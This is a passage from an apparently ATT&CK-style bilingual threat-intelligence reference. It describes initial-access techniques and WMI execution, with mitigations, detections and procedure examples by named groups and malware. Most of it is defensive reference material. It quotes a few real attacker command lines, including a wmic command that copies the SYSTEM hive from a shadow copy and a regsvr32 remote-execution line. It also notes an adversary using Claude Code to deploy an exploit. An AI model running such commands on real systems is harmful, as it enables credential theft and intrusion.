fake anti-virus software. KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure. POORAIM has been delivered through compromised sites acting as watering holes. LoudMiner is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS. Bundlore has been spread through malicious advertisements on websites. IcedID has cloned legitimate websites/applications to distribute the malware. REvil has infected victim machines through compromised websites and exploit kits. Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer. Bad Rabbit spread through watering holes on popular sites by injecting JavaScript into the HTML body or a <code>.js</code> file. Snip3 has been delivered to targets via downloads from malicious domains. SocGholish has been distributed through compromised websites with malicious content often masquerading as browser updates. 敵対者は、インターネットに面したホストやシステムの弱点を悪用してネットワークへ初期アクセスを試みることがある。弱点はソフトウェアのバグ・一時的な不具合・設定ミスなどでありうる。 Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. 脆弱性スキャンを実施し、悪用され得る弱点を事前に特定・修正する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク越しのリソースアクセスを制限する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 公開アプリケーションの悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used SQL injection exploits against extranet web servers to gain access. During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers. During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers. During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access. During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. During the SolarWinds Compromise, APT29 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network. During C0027, Scattered Spider exploited CVE-2021-35464 in the ForgeRock Open Access Management (OpenAM) application server to gain initial access. During Cutting Edge, threat actors exploited CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure VPN appliances to enable authentication bypass and command injection. A server-side request forgery (SSRF) vulnerability, CVE-2024-21893, was identified later and used to bypass mitigations for the initial two vulnerabilities by chaining with CVE-2024-21887. For HomeLand Justice, threat actors exploited CVE-2019-0604 in Microsoft SharePoint for initial access. Versa Director Zero Day Exploitation involved exploitation of a vulnerability in Versa Director servers, since identified as CVE-2024-39717, for initial access and code execution. FrostyGoop Incident was likely enabled by the adversary exploiting an unknown vulnerability in an external-facing router. During ShadowRay, threat actors exploited CVE-2023-48022 on publicly exposed Ray servers to steal computing power and to expose sensitive data. ArcaneDoor abused WebVPN traffic to targeted devices to achieve unauthorized remote code execution. During Operation MidnightEclipse, threat actors exploited CVE-2024-3400 in Palo Alto Networks GlobalProtect. Leviathan exploited public-facing web applications and appliances for initial access during Leviathan Australian Intrusions. SPACEHOP Activity has enabled the exploitation of CVE-2022-27518 and CVE-2022-27518 for illegitimate access. FLORAHOX Activity has exploited and infected vulnerable routers to recruit additional network devices into the ORB. Quad7 Activity has enabled the exploitation of vulnerabilities for remote code execution capabilities in SOHO routers including CVE-2023-50224 and CVE-2025-9377 in TP-Link devices. During SharePoint ToolShell Exploitation, threat actors exploited authentication bypass and remote code execution vulnerabilities (CVE-2025-49706 and CVE-2025-49704) against on-premises SharePoint servers. This activity was characterized by crafted `POST` requests to the ToolPane endpoint `/_layouts/15/ToolPane.aspx`. During Operation Digital Eye, threat actors used SQL injection to compromise publicly exposed web and database servers. During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to deploy a custom exploit payload targeting an identified SSRF vulnerability to gain initial access to a targeted environment. Axiom has been observed using SQL injection to gain access to systems. Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers. APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites. APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access. Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server. Sandworm Team exploits public-facing applications for initial access and to acquire infrastructure, such as exploitation of the EXIM mail transfer agent in Linux systems. Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs. menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions. FIN7 has compromised targeted organizations through exploitation of CVE-2021-31207 in Exchange. Magic Hound has exploited the Log4j utility (CVE-2021-44228), on-premises MS Exchange servers via "ProxyShell" (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and Fortios SSL VPNs (CVE-2018-13379). Leviathan has used exploits against publicly-disclosed vulnerabilities for initial access into victim networks. MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). APT39 has used SQL injection for initial compromise. GALLIUM exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network. Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688. APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices. APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access. APT41 exploited CVE-2021-26855 against a vulnerable Microsoft Exchange Server to gain initial access to the victim network. BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server. Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware. Blue Mockingbird has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX. GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise. Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances. Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery. HAFNIUM has exploited multiple vulnerabilities to compromise edge devices and on-premises versions of Microsoft Exchange Server. BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers. Ember Bear gains initial access to victim environments by exploiting external-facing services. Examples include exploitation of CVE-2021-26084 in Confluence servers; CVE-2022-41040, ProxyShell, and other vulnerabilities in Microsoft Exchange; and multiple vulnerabilities in open-source platforms such as content management systems. Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish. Moses Staff has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers. FIN13 has exploited known vulnerabilities such as CVE-2017-1000486 (Primefaces Application Expression Language Injection), CVE-2015-7450 (WebSphere Application Server SOAP Deserialization Exploit), CVE-2010-5326 (SAP NewWeaver Invoker Servlet Exploit), and EDB-ID-24963 (SAP NetWeaver ConfigServlet Remote Code Execution) to gain initial access. Volt Typhoon has gained initial access through exploitation of multiple vulnerabilities in internet-facing software and appliances such as Fortinet, Ivanti (formerly Pulse Secure), NETGEAR, Citrix, and Cisco. Cinnamon Tempest has exploited multiple unpatched vulnerabilities for initial access including vulnerabilities in Microsoft Exchange, Manage Engine AdSelfService Plus, Confluence, and Log4j. ToddyCat has exploited the ProxyLogon vulnerability (CVE-2021-26855) to compromise Exchange Servers at multiple organizations. APT5 has exploited vulnerabilities in externally facing software and devices including Pulse Secure VPNs and Citrix Application Delivery Controllers. Agrius exploits public-facing applications for initial access to victim environments. Examples include widespread attempts to exploit CVE-2018-13379 in FortiOS devices and SQL injection activity. INC Ransom has exploited known vulnerabilities including CVE-2023-3519 in Citrix NetScaler for initial access. Winter Vivern has exploited known and zero-day vulnerabilities in software usch as Roundcube Webmail servers and the "Follina" vulnerability. Play has exploited known vulnerabilities for initial access including CVE-2018-13379 and CVE-2020-12812 in FortiOS and CVE-2022-41082 and CVE-2022-41040 ("ProxyNotShell") in Microsoft Exchange. Sea Turtle gained access to victim environments by exploiting multiple known vulnerabilities over several campaigns. BlackByte exploited vulnerabilities such as ProxyLogon and ProxyShell for initial access to victim environments. Salt Typhoon has exploited CVE-2018-0171 in the Smart Install feature of Cisco IOS and Cisco IOS XE software for initial access. UNC3886 has exploited CVE-2022-42475 in FortiOS SSL VPNs to obtain access. Medusa Group has leveraged public facing vulnerabilities in their campaigns against victim organizations to gain initial access. Medusa Group has also utilized CVE-2024-1709 in ScreenConnect, and CVE-2023-48788 in Fortinet EMS for initial access to victim environments. Storm-0501 has exploited N-day vulnerabilities associated with public facing services to gain initial access to victim environments to include Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler “Citrix Bleed” (CVE-2023-4966), and Adobe ColdFusion 2016 (CVE-2023-29300 or CVE-2023-38203). MirrorFace has exploited vulnerabilities in Fortigate and Array AG devices for initial access. VOID MANTICORE has exploited public facing vulnerabilities within victim environments to include SharePoint CVE-2019-0604. Havij is used to automate SQL injection. sqlmap can be used to automate exploitation of SQL injection vulnerabilities. ZxShell has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322. SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries. Siloscape is executed after the attacker gains initial access to a Windows container using a known vulnerability. COATHANGER is installed following exploitation of a vulnerable FortiGate device. BOLDMOVE is associated with exploitation of CVE-2022-49475 in FortiOS. Qilin has been delivered through exploitation of exposed applications and interfaces including Citrix and RDP. 敵対者は、最終消費者が受け取る前に製品や製品配送機構を操作し、データやシステムの侵害を図ることがある。 Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 敵対者は、最終消費者が受け取る前に、ソフトウェアの依存関係や開発ツールを操作することがある。Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications, such as pip and NPM packages, may be targeted as a means to add malicious code to users of the dependency. This may also include abandoned packages, which in some cases could be re-registered by threat actors after being removed by adversaries. Adversaries may also employ "typosquatting" or name-confusion by choosing names similar to existing popular libraries or packages in order to deceive a user. 敵対者は、最終消費者が受け取る前にアプリケーションソフトウェアを操作することがある。Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. 敵対者は、最終消費者が受け取る前に製品中のハードウェア部品を操作することがある。Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 脆弱性スキャンを実施し、悪用され得る弱点を事前に特定・修正する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 サプライチェーン侵害に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Sandworm Team staged compromised versions of legitimate software installers on forums to achieve initial, untargetetd access in victim environments. OilRig has leveraged compromised organizations to conduct supply chain attacks on government entities. Ember Bear has compromised information technology providers and software developers providing services to targets of interest, building initial access to ultimate victims at least in part through compromise of service providers that work with the victim organizations. Raccoon Stealer has been distributed through cracked software downloads. Lumma Stealer has been delivered through cracked software downloads. 敵対者は、本来の標的にアクセスできる組織を侵害・利用することがある。信頼された第三者関係を通じたアクセスは、既存の信頼を悪用する。 Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 信頼関係の悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems. Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network. APT29 has compromised IT, cloud services, and managed services providers to gain broad access to multiple customers for subsequent operations. Threat Group-3390 has compromised third party service providers to gain access to victim's environments. Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization. Additionally, Sandworm Team has accessed Internet service providers and telecommunication entities that provide mobile connectivity. menuPass has used legitimate access granted to Managed Service Providers in order to access victims of interest. GOLD SOUTHFIELD has breached Managed Service Providers (MSP's) to deliver malware to MSP customers. HAFNIUM has used stolen API keys and credentials associated with privilege access management (PAM), cloud app providers, and cloud data management companies to access downstream customer environments. LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations. POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company. RedCurl has gained access to a contractor to pivot to the victim’s infrastructure. Sea Turtle targeted third-party entities in trusted relationships with primary targets to ultimately achieve access at primary targets. Entities targeted included DNS registrars, telecommunication companies, and internet service providers. VOID MANTICORE has targeted IT and service providers in an effort to obtain credentials, relying largely on compromised VPN accounts for initial access. 敵対者は、コンピュータ周辺機器・ネットワーク機器・その他のコンピューティングデバイスを物理的にシステムやネットワークへ持ち込み、侵入ベクトルとして利用することがある。 Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 ネットワーク越しのリソースアクセスを制限する。 ハードウェアの追加に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 DarkVishnya physically connected Bash Bunny, Raspberry Pi, netbooks, and inexpensive laptops to the target organization's environment to access the company’s local network. 敵対者は、被害者システムへのアクセスを得るためフィッシングメッセージを送ることがある。あらゆる形態のフィッシングは電子的に配信されるソーシャルエンジニアリングである。標的を絞ったスピアフィッシングや、不特定多数向けの大量配信がある。 Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. 敵対者は、被害者システムへのアクセスを得るため、悪意ある添付ファイル付きのスピアフィッシングメールを送ることがある。Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. 敵対者は、被害者システムへのアクセスを得るため、悪意あるリンク付きのスピアフィッシングメールを送ることがある。Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. 敵対者は、第三者サービス経由でスピアフィッシングメッセージを送り、被害者システムへのアクセスを試みることがある。Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 敵対者は、音声通信を用いて最終的に被害者システムへのアクセスを得ることがある。Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: Impersonation) and/or creating a sense of urgency or alarm for the recipient. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 危険なWebコンテンツへのアクセスを制限する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 システムやアカウントを監査し、不正な活動を検出する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 ソフトウェアを安全に構成し、悪用を防ぐ。 フィッシングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Axiom has used spear phishing to initially compromise victims. MuddyWater has sent phishing emails to targets from the email address support@microsoftonlines[.]com. Kimsuky has used spearphishing to gain initial access and intelligence. GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victim's machines. INC Ransom has used phishing to gain initial access. Sea Turtle used spear phishing to gain initial access to victims. AppleJeus has used spearphishing emails to distribute malicious payloads. VOID MANTICORE has emailed victims threatening messages. VOID MANTICORE has used phishing as an initial access vector. Hikit has been spread through spear phishing. Royal has been spread through the use of phishing campaigns including "call back phishing" where victims are lured into calling a number provided through email. INC Ransomware campaigns have used spearphishing emails for initial access. 敵対者は、オンラインのネットワークトラフィックに悪意あるコンテンツを注入することで、被害者へのアクセスを得て継続的に通信することがある。標的を特定の場所へ誘い込む代わりに、通信経路上で注入する。 Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems. 危険なWebコンテンツへのアクセスを制限する。 機微情報を暗号化し、窃取時の影響を軽減する。 コンテンツインジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware. Disco has achieved initial access and execution through content injection into DNS, HTTP, and SMB replies to targeted hosts that redirect them to download malicious files. 敵対者は、無線ネットワークへ接続することで標的システムへ初期アクセスを得ることがある。標的が利用する開放Wi-Fiの悪用や、認証情報の取得による接続などで達成しうる。 Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring Valid Accounts — belonging to a target organization. Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection. ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 機微情報を暗号化し、窃取時の影響を軽減する。 Wi-Fiネットワークに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During APT28 Nearest Neighbor Campaign, APT28 established wireless connections to secure, enterprise Wi-Fi networks belonging to a target organization for initial access into the environment. APT28 has exploited open Wi-Fi access points for initial access to target devices using the network. 敵対者は、WMIを悪用してローカル/リモートでコマンドやスクリプトを実行することがある。 Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems. WMI is an administration feature that provides a uniform environment to access Windows system components. アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 Windows Management Instrumentationに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version. During FunnyDream, the threat actors used `wmiexec.vbs` to run remote commands. During Operation Wocao, threat actors has used WMI to execute commands. During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host. During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (`wmiprvse.exe`) to execute a variety of encoded PowerShell scripts using the `DownloadString` method. During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script. During the SolarWinds Compromise, APT29 used WMI for the remote execution of files for lateral movement. During the 2016 Ukraine Electric Power Attack, WMI in scripts were used for remote execution and system surveys. During C0027, Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket. During HomeLand Justice, threat actors used WMI to modify Windows Defender settings. During SharePoint ToolShell Exploitation, threat actors used WMI for execution. During Operation AkaiRyū, MirrorFace used WMI to proxy execution of UPPERCUT. The Deep Panda group is known to utilize WMI for lateral movement. APT29 used WMI to steal credentials and execute backdoors at a future time. Naikon has used WMIC.exe for lateral movement. A Threat Group-3390 tool can use WMI to execute a binary. Lotus Blossom has used WMI to enable lateral movement. Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement. Sandworm Team has used Impacket’s WMIexec module for remote code execution and VBScript to run WMI queries. FIN6 has used WMI to automate the remote execution of PowerShell scripts. Stealth Falcon malware gathers system information via Windows Management Instrumentation (WMI). menuPass has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI. FIN7 has used WMI to install malware on targeted systems. Gamaredon Group has used WMI to execute scripts used for discovery and for determining the C2 IP address. Gamaredon Group has used the following WMI query to search for a ping record: `Select * From Win32_PingStatus where Address = 'mil.gov.ua'`. OilRig has used WMI for execution. APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process. Magic Hound has used a tool to run `cmd /c wmic computersystem get domain` for discovery. FIN8's malicious spearphishing payloads use WMI to launch malware and spawn `cmd.exe` execution. FIN8 has also used WMIC and the Impacket suite for lateral movement, as well as during and post compromise cleanup activities. Leviathan has used WMI for execution. MuddyWater has used malware that leveraged WMI for execution and querying host information. GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets. APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit. APT41 has executed files through Windows Management Instrumentation (WMI). APT-C-36 has used WMI to execute PowerShell. Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally. Wizard Spider has also used batch scripts to leverage WMIC to deploy ransomware. Blue Mockingbird has used wmic.exe to set environment variables. Windshift has used WMI to collect information about target machines. Chimera has used WMIC to execute remote commands. Indrik Spider has used WMIC to execute commands on remote computers. Mustang Panda has executed PowerShell scripts via WMI. Aquatic Panda used WMI for lateral movement in victim environments. Ember Bear has used WMI execution with password hashes for command execution and lateral movement. Earth Lusca used a VBA script to execute WMI. FIN13 has utilized `WMI` to execute commands and move laterally on compromised Windows machines. Volt Typhoon has leveraged WMIC for execution, remote system discovery, and to create and use temporary directories. TA2541 has used WMI to query targeted systems for security products. Cinnamon Tempest has used Impacket for lateral movement via WMI. ToddyCat has used WMI to execute scripts for post exploit document collection. INC Ransom has used WMIC to deploy ransomware. BlackByte used WMI to delete Volume Shadow Copies on victim machines. APT42 has used Windows Management Instrumentation (WMI) to query anti-virus products. Velvet Ant used the `wmiexec.py` tool within Impacket for remote process execution via WMI. Medusa Group has utilized Windows Management Instrumentation to query system information. MirrorFace has leveraged WMIC on targeted systems post compromise. VOID MANTICORE has utilized WMIC to log into the victim host and create a process `process call create “cmd.exe /c copy \\?\\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public”`. The DustySky dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active. A BlackEnergy 2 plug-in uses WMI to gather victim host details. HALFBAKED can use WMI queries to gather system information. Cobalt Strike can use WMI to deliver a payload to a remote host. KOMPROGO is capable of running WMI queries. POWRUNER may use WMI when collecting information about a victim. PowerSploit's <code>Invoke-WmiCommand</code> CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload. POWERSTATS can use WMI queries to retrieve data from compromised hosts. GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed). RATANKBA uses WMI to perform process monitoring. Koadic can use WMI to execute commands. One variant of Zebrocy uses WMI queries to gather information. Mosquito's installer uses WMI to search for antivirus display names. OopsIE uses WMI to perform discovery techniques. Kazuar obtains a list of running processes through WMI querying. FELIXROOT uses WMI to query the Windows Registry. RogueRobin uses various WMI queries to check if the sample is running in a sandbox. jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details. Agent Tesla has used wmi queries to gather information from the system. Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI. Octopus has used wmic.exe for local discovery information. Impacket's `wmiexec` module can be used to execute commands through WMI. Empire can use WMI to deliver a payload to a remote host. Olympic Destroyer uses WMI to help propagate itself across a network. WannaCry utilizes <code>wmic</code> to delete shadow copies. Emotet has used WMI to execute powershell.exe. NotPetya can use <code>wmic</code> to help propagate itself across a network. Astaroth uses WMIC to execute payloads. Remexi executes received commands with wmic.exe (for WMI commands). HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository. PoshC2 has a number of modules that use WMI to execute tasks. StoneDrill has used the WMI command-line (WMIC) utility to run tasks. FlawedAmmyy leverages WMI to enumerate anti-virus on the victim. Ursnif droppers have used WMI classes to execute PowerShell commands. EvilBunny has used WMI to gather information about the system. Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network. Netwalker can use WMI to delete Shadow Volumes. Valak can use <code>wmic process call create</code> in a scheduled task to launch plugins and for execution. IcedID has used WMI to execute binaries. CrackMapExec can execute remote commands using Windows Management Instrumentation. REvil can use WMI to monitor for and kill specific processes listed in its configuration file. Lucifer can use WMI to log into remote machines for propagation. Bazar can execute a WMI query to gather information about the installed antivirus engine. SharpStage can use WMI for execution. MoleNet can perform WMI commands on the system. SUNBURST used the WMI query <code>Select * From Win32_SystemDriver</code> to retrieve a driver listing. EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines. Sibot has used WMI to discover network connections and configurations. Sibot has also used the Win32_Process class to execute a malicious DLL. Stuxnet used WMI with an <code>explorer.exe</code> token to execute on a remote share. EKANS can use Windows Mangement Instrumentation (WMI) calls to execute operations. DEATHRANSOM has the ability to use WMI to delete volume shadow copies. HELLOKITTY can use WMI to delete volume shadow copies. FIVEHANDS can use WMI to delete files on a target machine. Avaddon uses wmic.exe to delete shadow copies. QakBot can execute WMI queries to gather information. ProLock can use WMIC to execute scripts on targeted hosts. SysUpdate can use WMI for execution on a compromised host. DarkWatchman can use WMI to execute commands. CharmPower can use `wmic` to gather information from a system. Meteor can use `wmic.exe` as part of its effort to delete shadow copies. SILENTTRINITY can use WMI for lateral movement. HermeticWizard can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\<filename>.dll`. Action RAT can use WMI to gather AV products installed on an infected host. PyDCrypt has attempted to execute with WMIC. Bumblebee can use WMI to gather system information and to spawn processes for code injection. FunnyDream can use WMI to open a Windows command shell on a remote machine. Brute Ratel C4 can use WMI to move laterally. SVCReady can use `WMI` queries to detect the presence of a virtual machine environment. DarkTortilla can use WMI queries to obtain system information. BlackCat can use `wmic.exe` to delete shadow copies on compromised networks. Black Basta has used WMI to execute files over the network. BADHATCH can utilize WMI to collect system information, create new processes, and run malicious PowerShell scripts on a compromised machine. Sardonic can use WMI to execute PowerShell commands on a compromised machine. Snip3 can query the WMI class `Win32_ComputerSystem` to gather information. DarkGate has used WMI to execute files over the network and to obtain information about the domain. SocGholish has used WMI calls for script execution and system profiling. Akira will leverage COM objects accessed through WMI during execution to evade detection. Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer (MSI) package. INC Ransomware has the ability to use wmic.exe to spread to multiple endpoints within a compromised environment. LunarWeb can use WMI queries for discovery on the victim host. IMAPLoader uses WMI queries to query system information on victim hosts. Covenant can utilize WMI to install new Grunt listeners through XSL files or command one-liners. Latrodectus has used WMI in malicious email infection chains to facilitate the installation of remotely-hosted files. ShrinkLocker uses WMI to query information about the victim operating system. TAMECAT has used Windows Management Instrumentation (WMI) to query anti-virus products. LockBit 2.0 can use wmic.exe to delete volume shadow copies. PUBLOAD has used `wmic` to gather information from the victim device. TONESHELL has used WMI queries to gather information from the system. Qilin can use WMIC to change the Volume Shadow Copy Service (VSS) startup type to manual. LODEINFO can execute commands with WMI. ROAMINGHOUSE can use WMI to launch a legitimate executable later used to enable DLL sideloading. AshTag can use a .NET program to execute WMI queries and send unique victim IDs to C2. LAMEHUG can use wmic to collect system information. 敵対者は、タスクスケジューラ機能を悪用して、悪意あるコードを定期的または特定時刻に実行することがある。 